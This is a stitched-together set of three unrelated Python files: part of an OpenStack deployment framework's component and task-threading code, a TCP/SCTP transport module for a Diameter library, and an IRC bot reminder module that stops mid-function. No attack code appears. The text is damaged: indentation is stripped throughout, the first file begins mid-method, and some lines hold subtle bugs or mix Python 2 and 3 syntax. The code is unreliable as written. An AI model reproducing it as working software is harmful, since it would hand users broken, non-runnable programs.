consumed_as = d['component'].consumers.setdefault(self, [])
consumed_as.append(prefix + (d['sname'],))
else:
self.extend_consumers(d, prefix)
# TODO: other cases
def __init__(self, alias='', offset='', dependencies={}):
"""alias: The services from the nameless version will be refered ASIS,
The named versions will be suffixed @alias
like nova-api@RegionOne nova-api@RegionTWO
The component itself is referred as the lowercase leaf class name,
with the same suffix rules.
The alias is not for region name.
offset: In many cases a single component instance handles all versions
of the service on the same node, but in case the component
chooses to allow otherwise their name will include the offset
http@RegionOne@0 http@@0
dependencies: Each component can have TYPE slots for other components
The relationship is that the user defines the providers as dependencies.
"""
# if your class is just a customization of a normally leaf class
# you want to use the parent's name,
# i.e. if a mariadb subclass just changes something in a minor way
# you do not want every usage to be renamed, but if you start
# installing postgres it should have a different name
if self.leaf:
self.short_name = self.__class__.__name__.lower()
else:
# walk up the MRO until a leaf ancestor meant to carry the public name is found
next_cls = type(self).__mro__[1]
while not getattr(next_cls, 'leaf', True):
next_cls = next_cls.__mro__[1]
self.short_name = next_cls.__name__.lower()
assert self.short_name != 'component'
self.alias = alias
self.offset = offset
self.dependencies = dependencies
self.consumers = {}
self.extend_consumers(dependencies)
if alias or offset:
suffix = '@' + alias
else:
suffix = ''
if offset:
suffix += '@' + str(offset)
self.name = self.short_name + suffix
self.suffix = suffix
register_component(self)
self.changed = defaultdict(dict)
# per instance lock
nwc = util.lock_sigleton_call(self.have_content)
self.have_content = nwc # nwc.__get__(self, self)
def bound_to_instance(self, gf):
bounded = Task(gf, self)
name = gf.__name__
# bounded = gf.__get__(self, self)
setattr(self, name, bounded)
return bounded
def get_component_config(self):
"""Without argument only allowed on managed nodes"""
i = inv.get_this_inv()
ccc = i.get('component_configs')
cc = copy.deepcopy(self.default_component_config)
if ccc:
util.dict_merge(cc, ccc.get(self.name, dict()))
return cc
def compose(self):
"""called at compose lifecycle if the component or service involved.
Only called on the control node"""
if self.final_task:
add_goal(self.final_task)
def node_compose(self):
"""The managed nodes call it for node base composition,
for example required packages."""
pkgutils.add_compose(self.get_node_packages())
def get_final_task(self, task=None):
"""acquiring a task which can be waited for.
Usually it is the last task the component made,
but in some cases the component may initiate content fetch for later
usage (like datafiles for test);
if another task is better for the waiter,
it can be requested instead."""
pass
# NOTE: interface will change
def populate_peer_info_for(self, nodes=set(), mode=None, network='*'):
"""Used at compose phase for providing network connectivity information,
for other nodes, the exact payload is not defined,
The caller knows the callee implementation."""
# NOTE: Might be used for firewall rule creation `hints`
pass
def populate_extra_cfg_for(self, nodes, component, cfg_extend):
if isinstance(component, Component):
component_name = component.name
else:
component_name = component
for n in nodes:
node = self.get_node(n)
node['cfg_extend'].setdefault(component_name, {})
cdict = node['cfg_extend'][component_name]
util.dict_merge(cdict, cfg_extend)
# NOTE: cache it ?
def get_services_global_name(self):
""" get service dict with naming rules applied"""
if hasattr(self, '_get_services'):
return self._get_services
self._get_services = {k + self.suffix: v for (k, v) in self.services.items()}
return self._get_services
def call_do(self, hosts, the_do, c_args=tuple(), c_kwargs={}):
real_args = (self.name, ) + c_args
return inv.do_do(hosts, the_do, real_args, c_kwargs)
def call_diff_args(self, matrix, do):
return inv.do_diff(matrix, do, self.name)
def distribute_as_file(self, *args, **kwargs):
return inv.distribute_as_file(*args, **kwargs)
def distribute_for_command(self, *args, **kwargs):
return inv.distribute_for_command(*args, **kwargs)
def hosts_with_any_service(self, services):
return inv.hosts_with_any_service(set(s + self.suffix for s in services))
def hosts_with_component(self, component):
if isinstance(component, Component):
component_name = component.name
else:
if '@' not in component:
component_name = component + self.suffix
else:
component_name = component
return inv.hosts_with_component(component_name)
def get_state_dir(self, extra=''):
return util.get_state_dir(os.path.sep.join((self.name, extra)))
def hosts_with_service(self, service):
return inv.hosts_with_service(service + self.suffix)
def get_node(self, *args, **kwargs):
return inv.get_node(*args, **kwargs)
def get_this_node(self, *args, **kwargs):
return inv.get_this_node(*args, **kwargs)
def get_this_inv(self, *args, **kwargs):
return inv.get_this_inv(*args, **kwargs)
def get_addr_for(self, *args, **kwargs):
return inv.get_addr_for(*args, **kwargs)
def file_ini(self, target_path, paramters, *args, **kwargs):
node = self.get_this_node()
cfg_extend = node['cfg_extend']
node_inv = node['inv']
# we might support callable instead of plain type
if self.name in cfg_extend:
comp_cfg_extend = cfg_extend[self.name]
if target_path in comp_cfg_extend:
util.dict_merge(paramters, comp_cfg_extend[target_path]) # modifies the original dict!
extend_config = node_inv.get('components', {}).get(self.name, {}).get('extend_config', {})
if target_path in extend_config:
util.dict_merge(paramters, extend_config[target_path]) # modifies the original dict!
self.changed['file'][target_path] = cfgfile.ini_file_sync(target_path, paramters,
*args, **kwargs)
def file_plain(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.content_file(target_path,
*args, **kwargs)
# everything that appears on the fs is named as file
def file_path(self, link, *args, **kwargs):
self.changed['file'][link] = cfgfile.ensure_path_exists(link, *args, **kwargs)
def file_haproxy(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.haproxy_file(target_path, *args, **kwargs)
def file_rabbit(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.rabbit_file(target_path, *args, **kwargs)
def file_install(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.install_file(target_path, *args, **kwargs)
def file_sym_link(self, target_path, *args, **kwargs):
self.changed['file'][target_path] = cfgfile.ensure_sym_link(target_path, *args, **kwargs)
def etccfg_content(self, dry=None):
"""if your config can be done before any command call place it here,
this stept meant to be /etc like changes """
def have_binaries(self):
pkgutils.ensure_compose()
# let have_content() call these src_* steps
def src_fetch(self):
if self.deploy_source == 'src':
gconf = conf.get_global_config()
need_git = gconf.get('use_git', True) # switch these if you do have good image
if need_git: # TODO: add more repo types
gitutils.process_component_repo(self)
def src_compile(self):
pass
def src_install(self):
pass
def have_content(self):
self.have_binaries()
self.src_fetch()
self.src_compile()
self.src_install()
self.etccfg_content()
def wait_for_components(self, *comps):
task_wants(*(comp.final_task for comp in comps if comp.final_task), caller_name=self.__class__.__name__)
def get_node_packages(self):
"""which packages the component needs int current node context"""
return set()
def filter_node_enabled_services(self, candidates):
i = self.get_this_inv()
services = i.get('services', set())
return {c + self.suffix for c in candidates if c + self.suffix in services}
def get_enabled_services_from_component(self):
return self.filter_node_enabled_services(self.services.keys())
def unit_name_mapping(self, style):
return {}
# TODO add default bounce condition and coordinated bounce
def __str__(self):
return self.name
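# Minimal sketch of how a concrete component is typically declared; the class,
# service and package names below are illustrative only and not part of
# speedling itself:
#
#   class ExampleAPI(Component):
#       deploy_source = 'pkg'
#       services = {'example-api': {'deploy_mode': 'standalone'}}
#
#       def get_node_packages(self):
#           pkgs = super(ExampleAPI, self).get_node_packages()
#           pkgs.add('example-api-server')
#           return pkgs
#
#   # Instantiating registers the component and its suffixed services:
#   #   ExampleAPI(alias='RegionOne') -> component 'exampleapi@RegionOne',
#   #                                    service 'example-api@RegionOne'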
class LoadBalancer(Component):
deploy_source = 'pkg'
# TODO: make LB abstract to support LB != HAProxy
# NOTE: theoretically httpd can do ballancing, but ..
pass
class SQLDB(Component):
deploy_source = 'pkg'
# Consider postgres
def db_url(*args, **kwargs):
raise NotImplementedError
# provides basic db access to the listed schemas
def register_user_with_schemas(self, user, schema_names):
raise NotImplementedError
class Messaging(Component):
deploy_source = 'pkg'
def get_transport_url(self):
raise NotImplementedError
# scoping is very implementation specific
def register_user(self, user):
raise NotImplementedError
class VirtDriver(Component):
pass
# TODO: convince the localsh to have retry
def do_retrycmd_after_content(cname, cmd):
self = get_component(cname)
self.have_content()
retry = 30
while True:
try:
localsh.run(cmd)
except Exception:
if retry == 0:
raise
else:
break
time.sleep(0.2)
retry -= 1
class OpenStack(Component):
# TODO: place here some config possibility like worker number strategy
regions = ['RegionOne'] # move vips to region, keystone may register itself to multiple, but others should use a single one (per instance)
def get_node_packages(self):
pkgs = super(OpenStack, self).get_node_packages()
if self.deploy_source == 'src':
pkgs.update({'python3-pip', 'git', 'lib-dev\\python3',
'util-lang\\gcc-g++',
'lib-dev\\ffi', 'lib-dev\\xslt', 'lib-dev\\openssl',
'lib-py3\\pymysql'})
return pkgs
# overrides
def src_install(self):
gconf = conf.get_global_config()
need_pip = gconf.get('use_pip', True)
if need_pip:
piputils.setup_develop(self)
class InterfaceDriver(Component):
pass
# TODO: the chicken-and-egg problem can be solved as egg-and-chicken as well, it would be less confusing
class StorageBackend(Component):
def get_glance_conf_extend(self, sname):
"""provides full config dict, the name is the section name and ':type' glance expects
The response should be repeatable; the backend may store it as state."""
return {'/etc/glance/glance-api.conf': {}}
def get_cinder_conf_extend(self, sname):
"""provides full config dict, the name is the section name cinder expects
The response should be repeatable; the backend may store it as state."""
return {'/etc/cinder/cinder.conf': {}}
def get_nova_conf_extend(self):
return {'/etc/nova/nova.conf': {}}
def get_waits_for_nova_task(self):
return {self.final_task}
def get_waits_for_glance_task(self):
return {self.final_task}
def get_waits_for_cinder_task(self):
return {self.final_task}
def compose(self):
super(StorageBackend, self).compose()
for comp, consumed_ases in self.consumers.items():
if comp.short_name == 'glance': # The StorageBackend class should not be in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_glance_conf_extend(consumed_as[-1])
g_api_nodes = comp.hosts_with_service('glance-api')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
continue
if comp.short_name == 'nova': # The StorageBackend class should not be in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_nova_conf_extend()
g_api_nodes = comp.hosts_with_service('nova-compute')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
continue
if comp.short_name == 'cinder': # The StorageBackend class should not be in this file
for consumed_as in consumed_ases:
cfg_extend = self.get_cinder_conf_extend(consumed_as[-1])
g_api_nodes = comp.hosts_with_service('cinder-volume')
self.populate_extra_cfg_for(g_api_nodes, comp, cfg_extend)
ENSURE_COMPOSE_LOCK = threading.Lock()
def do_node_generic_system():
pkgutils.ensure_compose()
# Deprecated for external use
def _register_services(srvs):
if isinstance(srvs, abc.Mapping):
for n, srv in srvs.items():
# TODO: add name in the component loop
srv['name'] = n
REGISTERED_SERVICES[n] = srv
else: # list
# TODO: delete the list way
for srv in srvs:
assert srv['name'] not in REGISTERED_SERVICES
REGISTERED_SERVICES[srv['name']] = srv
def get_service_by_name(name):
return REGISTERED_SERVICES[name]
def register_component(component):
assert component.name not in REGISTERED_COMPONENTS
REGISTERED_COMPONENTS[component.name] = component
srvs = component.get_services_global_name()
if not srvs:
return
for s, d in srvs.items():
d['component'] = component
_register_services(srvs)
def get_component(component):
return REGISTERED_COMPONENTS[component]
GOALS = set()
def add_goals(goals):
GOALS.update(set(goals))
def add_goal(goal):
GOALS.add(goal)
def get_goals():
return GOALS
# cache
def get_local_active_services():
host_record = inv.get_this_inv()
services = host_record.get('services', set())
srvs = {}
for s in services:
if s not in REGISTERED_SERVICES:
LOG.warning("Unknown service '{}'".format(s))
else:
srvs[s] = REGISTERED_SERVICES[s]
return srvs
# cache
def get_local_active_components():
host_record = inv.get_this_inv()
services = get_local_active_services()
components = host_record.get('extra_components', set())
comps = set()
for c in components:
comp = REGISTERED_COMPONENTS.get(c, None)
if not comp:
LOG.warning("Unknown component '{}'".format(c))
else:
comps.add(comp)
for s, r in services.items():
c = r.get('component', None)
if c:
comps.add(c)
return comps
def compose():
for c in REGISTERED_COMPONENTS.values():
c.compose()
task_sync_mutex = threading.Lock()
pending = set()
def task_add_wants(task, *wants):
if hasattr(task, 'wants'):
task.wants += wants
else:
task.wants = wants
FAILED = []
def _taskify(*args):
task_sync_mutex.acquire()
for task in args:
if not hasattr(task, 'thr'):
task.failed = False
def helper_func():
t = task
start = time.time()
def _finish_log():
try:
if hasattr(t, 'wants'): # extra deps as task attribute
task_wants(*t.wants, caller_name=t.__name__)
t()
except BaseException:
FAILED.append(t)
t.failed = True
LOG.error(t.__name__ + ' failed in ' + str(time.time() - start) + 's (waits included)')
raise
else:
LOG.info(t.__name__ + ' finished in ' + str(time.time() - start) + 's (waits included)')
finally:
task_sync_mutex.acquire()
pending.remove(t)
task_sync_mutex.release()
return _finish_log
task.thr = threading.Thread(target=helper_func())
pending.add(task)
task.thr.start()
task_sync_mutex.release()
return [tsk for tsk in args if tsk.thr.is_alive()]
def log_pending():
task_sync_mutex.acquire()
LOG.info('Pending tasks:' + ', '.join((tsk.__name__ for tsk in pending)))
task_sync_mutex.release()
def start_pending():
def pending_task():
while True:
time.sleep(15)
log_pending()
t = threading.Thread(target=pending_task)
t.daemon = True
t.start()
def task_will_need(*args):
return _taskify(*args)
# methods cannot have extra attributes so you either use a class or a closure
# to duplicate tasks, BTW function copy also possible
class Task(object):
def __init__(self, fn, ctx):
self.fn = fn
self.ctx = ctx
self.__name__ = fn.__name__
def __call__(self, *args, **kwargs):
self.fn(self.ctx, *args, **kwargs)
def task_wants(*args, caller_name=None):
wait_for = _taskify(*args)
wait_for_names = [tsk.__name__ for tsk in wait_for]
if not caller_name:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
caller_name = calframe[1][3]
if wait_for:
LOG.info('%s is waiting for: %s' % (caller_name, str(wait_for_names)))
for wf in wait_for:
wf.thr.join()
for task in args: # late fail, we do not want to interrupt the world
if task.failed:
raise util.TaskAbort('Aborting %s because %s failed' % (caller_name, task.__name__))
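# Usage sketch for the task helpers above (illustrative only): a goal is a
# plain function (or a Task bound to a component instance); task_wants() runs
# its arguments in background threads and joins them before returning, so
# dependencies express themselves as ordinary calls at the top of a task.
#
#   def install_db():
#       ...
#
#   def configure_service():
#       task_wants(install_db)   # blocks until install_db finished or raises
#       ...
#
#   add_goal(configure_service)
#   # a runner would later kick off every goal via task_will_need(*get_goals())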
|
transport.py
|
# -*- coding: utf-8 -*-
"""
bromelia.transport
~~~~~~~~~~~~~~~~~~
This module defines the TCP transport layer connections that are used
underneath the Diameter application protocol.
:copyright: (c) 2020-present Henrique Marques Ribeiro.
:license: MIT, see LICENSE for more details.
"""
import copy
import logging
import random
import selectors
import socket
import threading
from .config import TRACKING_SOCKET_EVENTS_TIMEOUT
tcp_connection = logging.getLogger("TcpConnection")
tcp_client = logging.getLogger("TcpClient")
tcp_server = logging.getLogger("TcpServer")
class TcpConnection():
def __init__(self, ip_address, port):
self._recv_buffer = b""
self._send_buffer = b""
self.send_data_stream_queued = False
self._recv_data_stream = b""
self._recv_data_available = threading.Event()
self.write_mode_on = threading.Event()
self.read_mode_on = threading.Event()
self.recv_data_consumed = False
self.ip_address = ip_address
self.port = port
self.sock = None
self.is_connected = False
self.error_has_raised = False  # set when a socket error interrupts the read/write loop
self.sock_id = "".join(random.choice('0123456789ABCDEF') for i in range(16))
tcp_connection.debug(f"Creating Socket with ID {self.sock_id}")
self._stop_threads = False
self.selector = selectors.DefaultSelector()
self.tracking_events_count = 0
self.connection_attempts = 3
self.events_mask = selectors.EVENT_READ
def is_write_mode(self):
if self.events_mask & selectors.EVENT_WRITE:
return True
return False
def is_read_mode(self):
if self.events_mask & selectors.EVENT_READ:
return True
return False
def is_read_write_mode(self):
if self.events_mask & (selectors.EVENT_READ | selectors.EVENT_WRITE):
return True
return False
def close(self):
if not self.is_connected:
raise ConnectionError("There is no transport connection up for "\
"this PeerNode")
self.is_connected = False
try:
self.selector.unregister(self.sock)
tcp_connection.debug(f"[Socket-{self.sock_id}] De-registering "\
f"Socket from Selector address: "\
f"{self.selector.get_map()}")
self.sock.close()
tcp_connection.debug(f"[Socket-{self.sock_id}] Shutting "\
f"down Socket")
except KeyError as e:
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"such Selector registered")
self._stop_threads = True
def run(self):
if not self.is_connected:
raise ConnectionError(f"[Socket-{self.sock_id}] There is no "\
f"transport connection up for this Peer")
threading.Thread(name="transport_layer_bootstrapper",
target=self._run).start()
def _run(self):
while self.is_connected and not self._stop_threads:
self.events = self.selector.select(timeout=TRACKING_SOCKET_EVENTS_TIMEOUT)
self.tracking_events_count += TRACKING_SOCKET_EVENTS_TIMEOUT
for key, mask in self.events:
self.data_stream = key.data
if mask & selectors.EVENT_READ:
self.read()
if mask & selectors.EVENT_WRITE:
self.write()
def _set_selector_events_mask(self, mode, msg=None):
if mode == "r":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ]")
self.events_mask = selectors.EVENT_READ
self.selector.modify(self.sock, self.events_mask)
self.write_mode_on.clear()
self.read_mode_on.set()
elif mode == "w":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [WRITE]")
self.events_mask = selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.clear()
elif mode == "rw":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ/WRITE]")
self.events_mask = selectors.EVENT_READ | selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.set()
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask: Invalid entry")
def _write(self):
if self._send_buffer:
try:
sent = self.sock.send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def write(self):
if not self.send_data_stream_queued and self.data_stream:
self._send_buffer += self.data_stream
self.send_data_stream_queued = True
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data has "\
f"been queued into _send_buffer: "\
f"{self._send_buffer.hex()}")
self._write()
if self.send_data_stream_queued and not self._send_buffer:
self._set_selector_events_mask("r")
self.send_data_stream_queued = False
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"data to be sent for a while")
def _read(self):
try:
data = self.sock.recv(4096*64)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
except Exception:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def read(self):
self._read()
if self._recv_buffer:
self._recv_data_stream += copy.copy(self._recv_buffer)
self._recv_data_available.set()
self._recv_buffer = b""
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer has "\
f"been cleaned up")
self._set_selector_events_mask("r")
def test_connection(self):
while True:
try:
self.sock.send(b"")
return True
except OSError as e:
if e.args[0] == 10057:
self.connection_attempts -= self.connection_attempts
return False
class TcpClient(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.connect_ex((self.ip_address, self.port))
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class TcpServer(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
def run(self):
events = self.server_selector.select(timeout=None)
for key, mask in events:
tcp_server.debug(f"[Socket-{self.sock_id}] Event has been "\
f"raised on Main Socket: (mask, key) = "\
f"({mask}, {key})")
if key.data is None:
self.sock, self.remote_address = self.server_sock.accept()
self.sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] New Socket "\
f"bound to Main Socket: {self.sock}")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"New Socket into Selector address: "\
f"{self.selector.get_map()}")
super().run()
def close(self):
super().close()
try:
self.server_selector.unregister(self.server_sock)
tcp_server.debug(f"De-registering Main Socket from Selector "\
f"address: {self.server_selector.get_map()}")
self.server_sock.close()
tcp_server.debug("Shutting down Main Socket")
except KeyError:
tcp_server.debug("There is no such Selector registered")
import importlib
class SctpConnection(TcpConnection):
def __init__(self, ip_address, port):
self.sctp = importlib.import_module("sctp")
self._sctp = importlib.import_module("_sctp")
super().__init__(ip_address, port)
def _write(self):
if self._send_buffer:
try:
sent = self.sock.sctp_send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def _read(self):
try:
fromaddr, flags, data, notif = self.sock.sctp_recv(4096*64)
print("Msg arrived, flag %d" % flags)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
except Exception:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def test_connection(self):
state = self.sock.get_status()
if self.sock.get_status().state == state.state_ESTABLISHED:
return True
else:
self.connection_attempts -= self.connection_attempts
return False
class SctpClient(TcpClient, SctpConnection):
def __init__(self, ip_address, port):
SctpConnection.__init__(self, ip_address, port)
def test_connection(self):
return SctpConnection.test_connection(self)
def _read(self):
return SctpConnection._read(self)
def _write(self):
return SctpConnection._write(self)
def start(self):
try:
self.sock = self.sctp.sctpsocket_tcp(socket.AF_INET)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.sock.connect((self.ip_address, self.port))
self.is_connected = True
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class SctpServer(TcpServer, SctpConnection):
def __init__(self, ip_address, port):
SctpConnection.__init__(self, ip_address, port)
def test_connection(self):
return SctpConnection.test_connection(self)
def _read(self):
return SctpConnection._read(self)
def _write(self):
return SctpConnection._write(self)
def start(self):
try:
if self._sctp.getconstant("IPPROTO_SCTP") != 132:
raise Exception("SCTP not supported by system")
self.server_sock = self.sctp.sctpsocket_tcp(socket.AF_INET)
# sock.initparams.max_instreams = 3
# sock.initparams.max_ostreams = 3
# sock.events.clear()
# sock.events.data_io = 1
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
|
remind.py
|
"""
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
import os
import re
import time
import threading
import collections
from pytz import timezone, all_timezones_set
import pytz
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
def filename(self):
name = self.nick + '-' + self.config.host + '.reminders.db'
return os.path.join(self.config.dotdir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in data.iteritems():
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
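# Reminder database format (as read/written above): one reminder per line, tab-separated as
#   <unixtime>\t<channel>\t<nick>\t<message>
# e.g. "1389123456\t#channel\tnick\tbuy milk" (illustrative values only).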
def setup(bot):
#Having a db means pref's exists. Later, we can just use `if bot.db`.
if bot.db and not bot.db.preferences.has_columns('tz'):
bot.db.preferences.add_columns(['tz'])
if bot.db and not bot.db.preferences.has_columns('time_format'):
        bot.db.preferences.add_columns(['time_format'])
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
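# A minimal sketch (not part of the original module) of how the `scaling` table and the
# `periods` regex above turn a duration string such as "3h45m" into seconds.
# `parse_duration` is a hypothetical helper added only for illustration; the `remind`
# command below does its own, slightly different, parsing.
def parse_duration(text):
    """Return the number of seconds described by e.g. '3h45m' or '2 days'."""
    total = 0
    for amount, unit in re.findall(r'(\d+(?:\.\d+)?) ?(' + periods + ')', text):
        total += float(amount) * scaling.get(unit, 60)
    return int(total)
# parse_duration('3h45m') -> 13500  (3*3600 + 45*60)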
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
duration = 0
message = re.split('(\d+(?:\.\d+)? ?(?:' + periods + ')) ?', trigger.group(2))[1:]
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
print length
factor = scaling.get(grp.group(2), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
tzi = timezone('UTC')
if bot.db and trigger.nick in bot.db.preferences:
tz = bot.db.preferences.get(trigger.nick, 'tz') or 'UTC'
tzi = timezone(tz)
create_reminder(bot, trigger, duration, reminder, tzi)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssContinent/Large_City
message. Continent/Large_City is a timezone from the tzdb; a list of valid
options is available at http://dft.ba/-tz . The seconds and timezone are
optional.
"""
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if tz:
if tz not in all_timezones_set:
good_tz = False
if bot.db and tz in bot.db.preferences:
tz = bot.db.preferences.get(tz, 'tz')
if tz:
